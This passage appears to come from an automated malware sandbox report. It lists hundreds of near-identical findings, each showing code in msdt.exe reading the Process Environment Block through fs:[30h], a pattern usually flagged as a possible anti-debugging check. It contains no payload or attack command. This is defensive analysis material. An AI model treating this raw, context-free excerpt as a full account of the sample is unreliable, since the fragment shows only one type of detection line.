Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9080 mov eax, dword ptr fs:[00000030h] 2_2_04AC9080
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B43884 mov eax, dword ptr fs:[00000030h] 2_2_04B43884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B43884 mov eax, dword ptr fs:[00000030h] 2_2_04B43884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD849B mov eax, dword ptr fs:[00000030h] 2_2_04AD849B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC58EC mov eax, dword ptr fs:[00000030h] 2_2_04AC58EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B814FB mov eax, dword ptr fs:[00000030h] 2_2_04B814FB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h] 2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h] 2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46CF0 mov eax, dword ptr fs:[00000030h] 2_2_04B46CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_04B5B8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98CD6 mov eax, dword ptr fs:[00000030h] 2_2_04B98CD6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h] 2_2_04AF002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFBC2C mov eax, dword ptr fs:[00000030h] 2_2_04AFBC2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h] 2_2_04ADB02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h] 2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h] 2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h] 2_2_04B47016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h] 2_2_04B94015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h] 2_2_04B94015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h] 2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h] 2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h] 2_2_04B9740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h] 2_2_04B81C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h] 2_2_04B46C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE746D mov eax, dword ptr fs:[00000030h] 2_2_04AE746D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B82073 mov eax, dword ptr fs:[00000030h] 2_2_04B82073
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B91074 mov eax, dword ptr fs:[00000030h] 2_2_04B91074
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA44B mov eax, dword ptr fs:[00000030h] 2_2_04AFA44B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h] 2_2_04B5C450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h] 2_2_04B5C450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h] 2_2_04AE0050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h] 2_2_04AE0050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h] 2_2_04B451BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF35A1 mov eax, dword ptr fs:[00000030h] 2_2_04AF35A1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF61A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF61A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B469A6 mov eax, dword ptr fs:[00000030h] 2_2_04B469A6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h] 2_2_04B905AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h] 2_2_04B905AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h] 2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h] 2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h] 2_2_04AF1DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h] 2_2_04AC2D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA185 mov eax, dword ptr fs:[00000030h] 2_2_04AFA185
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEC182 mov eax, dword ptr fs:[00000030h] 2_2_04AEC182
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h] 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h] 2_2_04AFFD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h] 2_2_04AFFD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2990 mov eax, dword ptr fs:[00000030h] 2_2_04AF2990
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B78DF1 mov eax, dword ptr fs:[00000030h] 2_2_04B78DF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h] 2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h] 2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h] 2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h] 2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h] 2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B541E8 mov eax, dword ptr fs:[00000030h] 2_2_04B541E8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov ecx, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8E539 mov eax, dword ptr fs:[00000030h] 2_2_04B8E539
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B4A537 mov eax, dword ptr fs:[00000030h] 2_2_04B4A537
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98D34 mov eax, dword ptr fs:[00000030h] 2_2_04B98D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov ecx, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h] 2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h] 2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h] 2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h] 2_2_04AF513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h] 2_2_04AF513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACAD30 mov eax, dword ptr fs:[00000030h] 2_2_04ACAD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h] 2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h] 2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h] 2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC962 mov eax, dword ptr fs:[00000030h] 2_2_04ACC962
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h] 2_2_04AEC577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h] 2_2_04AEC577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h] 2_2_04ACB171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h] 2_2_04ACB171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h] 2_2_04AEB944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h] 2_2_04AEB944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B03D43 mov eax, dword ptr fs:[00000030h] 2_2_04B03D43
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B43540 mov eax, dword ptr fs:[00000030h] 2_2_04B43540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE7D50 mov eax, dword ptr fs:[00000030h] 2_2_04AE7D50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B446A7 mov eax, dword ptr fs:[00000030h] 2_2_04B446A7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h] 2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h] 2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h] 2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h] 2_2_04ADAAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h] 2_2_04ADAAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFFAB0 mov eax, dword ptr fs:[00000030h] 2_2_04AFFAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5FE87 mov eax, dword ptr fs:[00000030h] 2_2_04B5FE87
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h] 2_2_04AFD294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h] 2_2_04AFD294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2AE4 mov eax, dword ptr fs:[00000030h] 2_2_04AF2AE4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF16E0 mov ecx, dword ptr fs:[00000030h] 2_2_04AF16E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD76E2 mov eax, dword ptr fs:[00000030h] 2_2_04AD76E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF36CC mov eax, dword ptr fs:[00000030h] 2_2_04AF36CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2ACB mov eax, dword ptr fs:[00000030h] 2_2_04AF2ACB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98ED6 mov eax, dword ptr fs:[00000030h] 2_2_04B98ED6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7FEC0 mov eax, dword ptr fs:[00000030h] 2_2_04B7FEC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B08EC7 mov eax, dword ptr fs:[00000030h] 2_2_04B08EC7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7FE3F mov eax, dword ptr fs:[00000030h] 2_2_04B7FE3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACE620 mov eax, dword ptr fs:[00000030h] 2_2_04ACE620
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h] 2_2_04B04A2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h] 2_2_04B04A2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD8A0A mov eax, dword ptr fs:[00000030h] 2_2_04AD8A0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h] 2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h] 2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h] 2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF8E00 mov eax, dword ptr fs:[00000030h] 2_2_04AF8E00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81608 mov eax, dword ptr fs:[00000030h] 2_2_04B81608
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE3A1C mov eax, dword ptr fs:[00000030h] 2_2_04AE3A1C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h] 2_2_04AFA61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h] 2_2_04AFA61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h] 2_2_04ACAA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h] 2_2_04ACAA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov ecx, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD766D mov eax, dword ptr fs:[00000030h] 2_2_04AD766D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0927A mov eax, dword ptr fs:[00000030h] 2_2_04B0927A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h] 2_2_04B7B260
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h] 2_2_04B7B260
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98A62 mov eax, dword ptr fs:[00000030h] 2_2_04B98A62
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B54257 mov eax, dword ptr fs:[00000030h] 2_2_04B54257
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8EA55 mov eax, dword ptr fs:[00000030h] 2_2_04B8EA55
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h] 2_2_04B8AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h] 2_2_04B8AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h] 2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h] 2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h] 2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B95BA5 mov eax, dword ptr fs:[00000030h] 2_2_04B95BA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h] 2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h] 2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h] 2_2_04B47794
